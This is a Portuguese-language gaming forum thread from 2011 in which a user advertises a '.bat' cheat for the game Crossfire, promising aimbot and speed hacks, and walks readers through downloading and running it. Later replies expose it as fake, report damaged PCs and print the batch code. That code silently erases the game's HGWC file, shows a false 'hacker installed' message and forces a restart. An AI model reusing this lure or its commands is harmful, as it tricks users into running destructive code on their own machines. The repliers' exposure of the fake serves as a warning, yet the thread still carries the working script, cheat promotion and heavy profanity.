hackershowdebola 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 LEIAM TUDO PARA NÃO FICAR DÚVIDAS!!!!!!!!!!! Olá a todos, vim mostrar o meu novo hacker. Ele é .bat mais não vão ser noob e pensar que é hacker e essas outras coisas como os noob pensaram hoje. O arquivo .bat é só para ativar alguns arquivos na pasta z8games para não ser kickado do servidor. Esse hacker é contem: -Auto mira 100% -Anti-kick 100% -Anti-error 50% -Speed hacker 100% -100$ Free. Vídeo de eu usando esse hacker: [video=youtube;20Gz0TGXaYk] É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se Como utilizar: 1° Baixe. 2° Extraia a o arquivo. 3° Abra o arquivo. 4° Clique em iniciar hacker. 5° Seu pc irá reiniciar (Essa parte que os noob pensaram que era zuera) 6° Depois que seu PC reiniciar basta você entrar no Crossfire que o Hacker irá funcionar. COMO PARAR O HACKER? Simplesmente abra a pasta do hacker e abra a pasta de texto, dai nessa pasta terá algumas instruções e um pequeno código disponivel, copie esse código e volte para a pasta do hacker e clique com o botão direito em cima do 'iniciar hacker' e depois em editar, dai apague tudo o que tiver lá dentro e cole o texto que você copiou e salva, dai é só você abrir a pasta de novo e dai clicar em inciar hacker, dai irá carregar e o seu pc irá reiniciar automaticamente e pronto, o hacker estará fora do seu pc e do Crossfire. Ele é um cheat bem simples e util, e também é bem leve e não precisa instala. Ele é 100% Seguro e é bem simples mesmo, eu fiz ele rápidinho e ele foi feito pelo bloco de notas, mais é simples, mais bem util e legal, estou muito feliz por ter feito ele. Para não ficar dúvidas irei falar mais sobre esse hacker. -Ao iniciar ele, ele move para outro local um arquivo da pasta da z8games, assim fazendo o vote kick sempre ao ser iniciado colocar automaticamente 16 pontos em f12. -Outra parte é que meche com o mause com computador, ele sempre ao ser clicado avança na cabeça dos personagens do jogo, assim dando head shot. -Ele também altera um arquivo da pasta da Z8games fazendo você correr rápido. Esse Hacker também tem uma pasta invisivel dentro da que vocês irão baixar, pelo o amor de Deus, não excluam ela, se não caso vocês queiram tirar o hacker dai tem a copia dos arquivos que foram modificados para serem recolocados e fazer o Crossfire voltar ao normal. Como eu disse é muito simples mesmo e foi feito na mão, com o bloco de notas e eu não vou falar mais para a concorrência não plagiar minha ideia :) Caso vocês não consigam e caso não dê certo posta aí pra mim te ajudar, é bom saber se tiver algum erro para mim modificar rápidinho antes que alguém baixe. É isso aí galera, espero que gostem!, boa noite! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
pikante 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 ---' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
faci2010 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 hackershowdebola Escreveu: Eu não acho hacker lixo, eu só não gosto quando eles usam. Tipo eu jogo Crossfire para se divertir e é tão legal, uma maravilha de jogo, só que os hacker ficam estragando o jogo :´( Eu jogo a 3 anos e nunca baixei e nem usei hacker nem um. Eu só quero diminuir o número de hacker e aos hacker que já lerão minhas intenções com esse programinha que eu fiz, por favor não avise aos outros, menos concorrencia para vocês e menos hacker para me atrapalhar Eu não sei o que dizer, mais se vocês querem usar hacker por mim tudo beleza, mais eu tento fazer algo para conter isso. Agora seremos forçados a jogar com poucos brasileiros porque 2 em 10 brasileiros usarão hacker. Isso é decepsionante. E se fala membro com m não com n como você disse o hahahaha ou algo assim. NÃO BAIXE ISSO VAI DESLIGA SEU COMPUTADOR E BLOQUIAR O CROSSFIRE COMO ELE DISSE(NÃO SEI SE E VERDADE) ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
hackershowdebola 0 Postado 17 de Junho 2011 Autor Compartilhar Postado 17 de Junho 2011 Cara posta o seu tópico!, e é claro que vai reiniciar o PC, eu disse que iria. Esse é o unico hacker feito pelo bloco de notas, ele é muito bom. Esses iam bot aí é ruim que os cara kicka na hora. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kinith 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 Mano isso não vai engana ninguem olha vc mesmo dise no topico Reinicia O PC e dps disso seu PC nao vai ligar + se quiser baixem so aviso seu PC vai estraga ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
hahahuhulol 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 Cara desiste ninguem vai cair mais na sua e nesse tópico vc foi ainda mais nooob pq já começou falando do .bat se vc nao falasse pelo menos algum idiot poderia baixar mais vc é um inutil :fuck::fuck::fuck::fuck::fuck::fuck::fuck::fuck::fuck::fuck: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
dodo106 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 tira ele do forum fudeo meo pc tive ke formata aff ban aki nesse troxa f.d.p mew gastei 50 rs. por tua culpa filho da puta. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
hackershowdebola 0 Postado 17 de Junho 2011 Autor Compartilhar Postado 17 de Junho 2011 Pelo o amor de Deus, largue de ser noob, se vocês não acreditam em mim apenas baixe e clique em editar antes de abrir para vocês querem que são só comandos do hacker, eu ainda disse como eu fiz e disse como funciona, qual quer um pode clicar e ver como ele é formado e ver que não tem nada de mais. Parem de ser noob, se você não acredita simplesmente não baixe e também não responda os meus tópicos, você nem sabe e fica me xingando, fica postando só para fazer volume nas suas postagens!. Como eu faço pra bloquear esse cara pra ele não postar mais nos meus tópicos? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
' BlinDeD ™. 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 Tópico Brevemente Fechado [x] ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Mlzinha~ 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 Reclamação: hackershowdebola não querendo te onfender mais pare de ser noob, pois vc está fazendo isso a troco de quer :chingando: com o pc dos membros :raiva: Aviso: Não baixem todo hacker que vcs vêêm pela frente pois isso pode complica muita na vida do seu PC é sempre baixar aqueles confiavés que tem Scan e também é bom saber um pouco sobre virus Por mim:Eu nem baixeiii pois acreditei nos coméntarios do hahahuhulol ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Dark ™' 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 Não Baixe! Aqueles que não Leem Nada e sai baixando Não Baixe! Isso e um .BAT Quando reiniciar seu PC não irá mais ligar. D: Não BAIXEM! Closed [x] Abrç'z :amor: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
fabricio121 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 .BAT ! Clooosed ! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
~Doctor 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 nao baixem pessoal serioo esse cara vai ferrar com o pc de vcs quando reiniciar nao vai ligar mas closed akii :fuck: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
boylele10 0 Postado 17 de Junho 2011 Compartilhar Postado 17 de Junho 2011 idiota nub esse nem eh o crossfire z8 pode ver essa m4a1 n existe no crossfire z8 nuub ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
rio2012 0 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 CRL , Ban nesse viado . ! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
iHollow 0 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 Rolei no chão de tanto rir! Hack feito a mão no bloco de notas SHUSAHSUAHSUAHSUAHSUAHS' Sonha lek , nunca vai exitir algo assim... Ah , esse hack é o VIP antigo da MPGH AHSUHASUHASUHSUASHUAS' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
rodras10 0 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 essa arma primeiramente nao existo no crossfire da z8games segundo tem ai uma funcionalidade nao referida acima por ser montagem ai ele nao usa o tail aimbot que aponta directo para a cabeça eu aconselho a nao baixarem por nao ser fiavel closed por favor ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
looktchars 0 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 olha so eu baixei e fui dar uma olhada nos comandos e n gostei muinto n num tem nada de mais eli so ta zuando mesmo olha os comandos aki... cd.. cd.. cd.. cd.. cd arquivos de programas cd Z8Games cd CrossFire ERASE cd HGWC /q /s MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação. shutdown -r -c "Seu pc irá reiniciar para completar a instalação, quando ligar o pc novamente o hacker já estará instalado." -t 20 ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
20-mata-nuub 0 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 aew gente nem vo arriscar a baixar pq este video olha eu ja vejo ele a 2 anos bloko de notas gente e so criacao de virus e o pior que existe nuubs fazendo isso pq ele nao aprende a cria um cavalo de troia, apagar programa operacional, vai dea de ser nuub e tentar renligar o pc dos otros ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
israelvrb 1 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 Scans Fallsos da Ban nesse Filho da puta aew ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lpsilva 0 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 eu testei o hack só q num funfo .-. mais só reinicior não queimo pc nenhum, ainda sim acho q não foi serto o ban no cara pq ele tentou ajudar, e não é virus nem nada sómente um bando de nb q não baixou o conteudo, não testou e ainda por sima fica falando mal doque o cara postou sem se quer al menos ter provas que akilo ia foder o pc do user ¬¬' gente pf vai ser nb pra la!! o cara tentou ajudar, e vcs ficam falando zuera do post do cara. affz VÃO SER NB PRA LA VC S Q DEVERIAM SER BANIDOS!!!!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
matheus851123 0 Postado 19 de Julho 2011 Compartilhar Postado 19 de Julho 2011 Ban eterno! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
andrezinholk 0 Postado 5 de Agosto 2011 Compartilhar Postado 5 de Agosto 2011 Vou te reporta fica botando hack cheios de vírus tem ate trojan noob ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
deadblack15 0 Postado 5 de Agosto 2011 Compartilhar Postado 5 de Agosto 2011 nao funciona como ativa e ganha 10$ free ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Haduken75 0 Postado 5 de Agosto 2011 Compartilhar Postado 5 de Agosto 2011 Simplesmente ele desliga seu pc e ainda deleta o HGWC.exe da sua pasta do crossfire recomendo não baixarem pois eu ja baixei e editei esse vídeo ele pegou do youtube e modificou pois antes eu ja tinha visto e ainda de tudo esse video tambem e velho recomendo nao baixarem obedeça e agradeça cd.. cd.. cd.. cd.. cd arquivos de programas cd Z8Games cd CrossFire ERASE cd HGWC.exe /q /s MSG * Pronto o hacker está instalado. Clique em 'OK' para ir para a próxima faze da instalação. shutdown -r -c "Seu pc irá reiniciar para completar a instalação" -t 20 traduzindo Fake Closed Aqui Assistam: Agradeça Se Ajudei Não cai o Teu Dedo e Nem Custa ZP Sou Novato Mas Tentando Evoluir ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados